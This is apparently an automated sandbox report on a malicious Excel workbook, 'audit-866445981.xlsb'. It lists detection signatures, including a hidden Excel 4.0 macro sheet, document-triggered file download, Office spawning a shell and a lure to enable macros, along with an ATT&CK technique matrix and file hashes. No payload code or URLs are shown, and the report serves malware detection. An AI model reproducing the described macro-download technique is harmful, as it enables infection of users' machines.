Analysis Report audit-866445981.xlsb
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Window / User API: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting2 | DLL Side-Loading1 | Process Injection1 | Masquerading1 | OS Credential Dumping | Query Registry1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution2 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Extra Window Memory Injection1 | Virtualization/Sandbox Evasion1 | Security Account Manager | Virtualization/Sandbox Evasion1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting2 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Regsvr321 | Cached Domain Credentials | System Information Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
No contacted IP infos |
---|
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 433270 |
Start date: | 11.06.2021 |
Start time: | 15:02:52 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 31s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | audit-866445981.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 20 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal68.expl.evad.winXLSB@7/10@0/0 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
15:03:50 | API Interceptor |
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134922 |
Entropy (8bit): | 5.3691112587971155 |
Encrypted: | false |
SSDEEP: | 1536:QcQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:4EQ9DQW+ziXOe |
MD5: | C7D95D325272508ED3E1E68923363114 |
SHA1: | C1DD969592778CDB77E55DE51D37987FD18EC587 |
SHA-256: | 56F6249B1A4E7E0CB08F4E01E06DF59A829B8FD49554ABC93DBEFF3C697441A2 |
SHA-512: | 37D9268050E49F97DC79C9D2E985E50FA53F1DF3511ADB7E8B460032A939CF71FE252F00091BC2021F2102D15578648A7BAC4822CEFB14D08E92AB78DD01E48A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 32996 |
Entropy (8bit): | 7.975478139053759 |
Encrypted: | false |
SSDEEP: | 768:N4k48AnTViUidx37OODgvnrxtxAudMN1VTRVHdB4K7K:NE8m+L37OOwrCXN1VTR1PK |
MD5: | 4E69B72B0CE87CC7EE30AA1A062147FE |
SHA1: | 09B0AA5414E08756E0AE53E1BE5C70DB4DEAF2E8 |
SHA-256: | 77A1F749389CBF771D5197FF0FF17113FCA1D91989ADCADF2852876A6CC14988 |
SHA-512: | 6246AF2137E773F7719033AFE75F0B00FF3A4B5543DBA53737FC8D33EE42478E3D8A5CF166E9EFD2F54A2F3E0D62417BDDC1CB824642305B59AB1229313D2D79 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 42557 |
Entropy (8bit): | 7.992800895943226 |
Encrypted: | true |
SSDEEP: | 768:Pfsq4UmepRdblCFcXhw9KnRTRews6xD0FvBlwAS1A8x7BcS0OvD230:PR3ZblCF28KRsws6CFv0AYx7Bl3b230 |
MD5: | B1F262A694930ADB699FA94E3394887F |
SHA1: | 9C9B66D3A3F09AECA45DB94304CDD6FB3C5BD4C9 |
SHA-256: | 9C99EC61392B9022A38C1354124360147E8185065095BD2EC92B1416CF9F4B68 |
SHA-512: | 1CA7E6750178B88EC3AA7A0B83348EA389E26C27E0D7E919D807BE470714E5B4F04ACEB69D391F0498D4E465E6620E9449CA2F40755B5CE8196E683502EBF5F4 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 10270 |
Entropy (8bit): | 7.975714699744477 |
Encrypted: | false |
SSDEEP: | 192:3sXvKLMbye/PEXiKTUgCto9h4F6NwfU6vGDpdYNbcQZgkbd4cgc:3iLh/gJ59CDfU6LocbGK |
MD5: | 9C4F09E387EA7B36C8149EA7C5F8876E |
SHA1: | FF83384288EB89964C3872367E43F25FAFF007CC |
SHA-256: | A51C1D65092272DAEB2541D64A10539F0D04BC2F51B281C7A3296500CFCA56DE |
SHA-512: | 0FDDE22CFDDE8BB1C04842D2810D0FD6D42192594E0D6120DE401B08B7E2CFFB5333792BC748E93CD70FA14734CC7D950620CB977DDBBDB52D92BDA8F35521F8 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 18547 |
Entropy (8bit): | 7.9850486438978985 |
Encrypted: | false |
SSDEEP: | 384:kBCIQCloAwCZDy0xOTn6/g6l4NpWfw9nHk6Ka01f7Y/H:kBCIQpAwODPMT6/gfOUKN70 |
MD5: | ED31C7053D581EDC4C98D222CE02EDEF |
SHA1: | 6BA7A49CC6FF8FE00E9C5BC75F48AB7E679536DD |
SHA-256: | 0FCF61397154DF01CFAECA362BD643D88AAD5FEDD07B52DC8A921CC0D7236534 |
SHA-512: | 929BF13F2A050B33D0EABDAC97CAAFDDE612AD521027FEE4DD51E28A3CF61198D6C045E00AB85223C73D74D18BB4EAA1681C7AFA917946DC08A3C75FB2AB4935 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 159443 |
Entropy (8bit): | 7.962639561943536 |
Encrypted: | false |
SSDEEP: | 3072:y89VlUBWA6CFvA7brCxAVIKuSkmxVymd1xXP8lTkdm3bGeAxilFz:y83liWA6FiYpxVyWxf8lTkeGKf |
MD5: | BDF789CD1364BE8F1488716F3583AFD0 |
SHA1: | 5418B8AFC1AD0A751F7F88CC1E92A3297116748C |
SHA-256: | 6324864DC24DBF7F25C5200B1676B69C71DACD3DAA277BBDA61FB87EA1E555E8 |
SHA-512: | 5D3DD1BD9B6C6C0C2DE036AE70D4EBA8A6885B8138537C12C86B58888D132129AD248A8C7365592558A7BE8346B355CB1D0E0A88B35E0A93514049DADB714F74 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.955290462322502 |
TrID: |
|
File name: | audit-866445981.xlsb |
File size: | 158780 |
MD5: | e1fdc1cf780e50ec43eee2ee43dfc730 |
SHA1: | 2de4c0600e360e355cc2c26ffcfc5f378bf20db4 |
SHA256: | aacfdf7e9a3ec72b953c651bfc27e7d84c46b8656170867eca64a7a09d8d1bcd |
SHA512: | baed5a7c7600b9845f722b4c3d0a80902bf9b111c9d3bd324c1b33bbf57e338358d648e8a291a772425509fa3e9272ec0cae4918e26e05e5375d82b4b75d6171 |
SSDEEP: | 3072:7tbU9VlUBWA6CFvA7bRCxAVIK2xVymd1xXP+Ph9vajtC1gBbZP6i:hU3liWA6FsY2xVyWxf+QegBbd |
File Content Preview: | PK..........!.^.~.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74f0d0d2c6d6d0f4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "audit-866445981.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
